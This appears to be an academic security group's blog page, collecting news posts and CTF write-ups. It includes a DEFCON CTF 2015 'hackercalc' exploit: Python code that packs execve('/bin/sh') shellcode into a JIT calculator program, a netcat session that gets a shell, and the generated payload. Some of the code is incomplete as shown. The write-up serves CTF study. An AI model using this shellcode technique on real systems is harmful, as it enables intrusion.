New attacks on crypto tokens

We performed some experiments on the low-level APDU protocols of several smartcards and authentication tokens. Results include sensitive cryptographic keys in the clear, PINs in the clear or easily reversible, stateless protocols that allow easy injection of commands and restrictions on key use enforced at the PKCS#11 (driver) level that are trivially bypassed at the APDU level.

Our findings will be presented in September at the 19th International Symposium on Research in Attacks, Intrusions and Defenses – RAID 2016 (a preprint of the paper is available here).

We have published a summary of the paper.

Clipperz seminar @ secgroup

On June 11, Giulio Cesare Solaroli, Marco Barulli and Dario Chiappetta have visited our group to talk about the Clipperz system and discuss challenging issues regarding encrypted cloud. Clipperz is a sophisticated system that makes it possible to store sensitive data in the cloud while providing an extremely high level of privacy. All the sensitive operations are performed in the client so that Clipperz backend will never be able to access user’s data in the clear. Interestingly, Clipperz is not even aware of actual usernames so that an attack to the server database would not allow to link (encrypted) data to users.

Thanks to Giulio, Marco and Dario for the very interesting day! We hope to hear more from Clipperz …

DEFCON CTF 2015 hackercalc exploit

Hackercalc is an x86 calculator JIT compiler.
Download binary


DEFCON CTF 2015 hackercalc exploit.
Written by repnzscasb, c00kies@venice.

$ (python; cat - ) | nc -vv 21222
Connection to 21222 port [tcp/*] succeeded!
RUa rir1 -
rP0nDdSSPr.rnsT koaL nr0:e-oEt U eo nNr Oex oonnTpOEpyw
uid=1001(hackercalc) gid=1001(hackercalc) groups=1001(hackercalc)
cat /home/hackercalc/flag
The flag is: Congratulations!!! strfry! hackercalc! x86jit! hatec++RE! givemesymbolsnexttime!

from struct import unpack

def toint(s):
    return unpack('<I', s)[0]

# Shellcode from
# Modified to use two-bytes opcodes only.
shellcode = [
    "\x31\xc9", # xor ecx, ecx
    "\xf7\xe1", # mul ecx
    "\x51",     # push ecx
    "\xb4\x68", # mov ah, 0x68
    "\xb0\x73", # mov al, 0x73
    "\x66\x50", # push ax
    "\xb4\x2f", # mov ah, 0x2f
    "\xb0\x6e", # mov al, 0x6e
    "\x66\x50", # push ax
    "\xb4\x69", # mov ah, 0x69
    "\xb0\x62", # mov al, 0x62
    "\x66\x50", # push ax
    "\xb4\x2f", # mov ah, 0x2f
    "\xb0\x2f", # mov al, 0x2f
    "\x66\x50", # push ax
    "\x89\xe3", # mov ebx, esp
    "\x31\xc0", # xor eax, eax
    "\xb0\x0b", # mov al, 11
    "\xcd\x80", # int 0x80

# Only 3 bytes will be written at this point, so we skip to the next shellcode instruction
# \x00 is padding
jskip = "\x00" + "\xeb\x08" + "\x00"
jskip = toint(jskip)

# Build the shellcode using 4-bytes blocks like <2-bytes opcode><2-bytes jmp next opcode> 
jnext = "\xeb\x07"
code = ""
for o in shellcode:
    asm = o.ljust(2, "\x90") + jnext
    code += "\tx = {:d}\n".format(toint(asm))

# Build the payload
payload = '''
func b1(x)
func b2(x)
func b3(x)
func b4(x)
func b5(x)
func b6(x)
func b7(x)
func a(x)
run a(0)
'''.format(jskip, code)


This is the generated calculator program which calls execve(“/bin/sh”):

func b1(x)
func b2(x)
func b3(x)
func b4(x)
func b5(x)
func b6(x)
func b7(x)
func a(x)
	x = 132892977
	x = 132899319
	x = 132878417
	x = 132868276
	x = 132871088
	x = 132862054
	x = 132853684
	x = 132869808
	x = 132862054
	x = 132868532
	x = 132866736
	x = 132862054
	x = 132853684
	x = 132853680
	x = 132862054
	x = 132899721
	x = 132890673
	x = 132844464
	x = 132874445

run a(0)

Convegno Nazionale Cyber Security

Riccardo Focardi will present Cryptosense at the National Congress on Cyber Security, organized by Centro Studi Difesa e Sicurezza (CESTUDIS) and Centro di Ricerca di Cyber Intelligence e Information Security of University “La Sapienza”, Rome in collaboration with Dipartimento informazione e sicurezza della Presidenza del Consiglio dei Ministri.

The aim of the congress is to support collaboration among government agencies, universities and private companies working in critical infrastructures, finance, economy and security systems.

The meeting is on December 1, 2014 at Aula Magna of University “La Sapienza”. Here you can find the detailed program and on-line registration.

PhD position in Venice and Paris

The information security group at Ca’ Foscari University, Venice, has an open fully funded PhD position on “Automated analysis of cryptographic and hardened systems”. The position is co-funded by the PRIN Research Project “Security Horizons” and by the spin-off Cryptosense.

The PhD student will mainly work on developing models and theories for systems and cryptographic devices that are applicable in practice. The research will be organized in collaboration with Cryptosense, Paris, a spin-off specialized in the development of security analysis software for the financial, industrial and government sectors.

For more information please contact Prof. Riccardo Focardi.

Appication deadline is May 29th, 2014 at 1:00 pm (CEST) and can be done on-line here. 2013 CTF Write-Up: Roboparty

Robot LHCH is happy. He made it into the castings for the tenth roman musical. He even is so happy that he went on the Oktoberfest to drink some beer. Unfortunately it seems that he drank too much so now he is throwing up part of his source code. Can you decipher the secret he knows?

Warning: Viewing this page is not recommended for people that suffer from epilepsy. We are dead serious.

And here is your totally eye-friendly challenge:

The linked page provided a tripping psychedelic experience to our team. After connecting a laptop to the projector with the page in fullscreen mode, we spent half of the CTF partying hard.

Continue reading “ 2013 CTF Write-Up: Roboparty” 2013 CTF Write-Up: What’s wrong with this?

We managed to get this package of the robots servers. We managed to determine that it is some kind of compiled bytecode. But something is wrong with it. Our usual analysis failed – so we have to hand this over to you pros. We only know this: The program takes one parameter and it responds with “Yup” if you have found the secret code, with “Nope” else. We expect it should be obvious how to execute it.

The challenge provides a compressed archive hello.tar.gz which contains a bunch of shared objects, an archive called (actually an ELF executable with an embedded ZIP) and a Python interpreter py. The executable to be cracked is hello, which will reply “Yup” if the correct flag is provided, “Nope” otherwise.

Continue reading “ 2013 CTF Write-Up: What’s wrong with this?”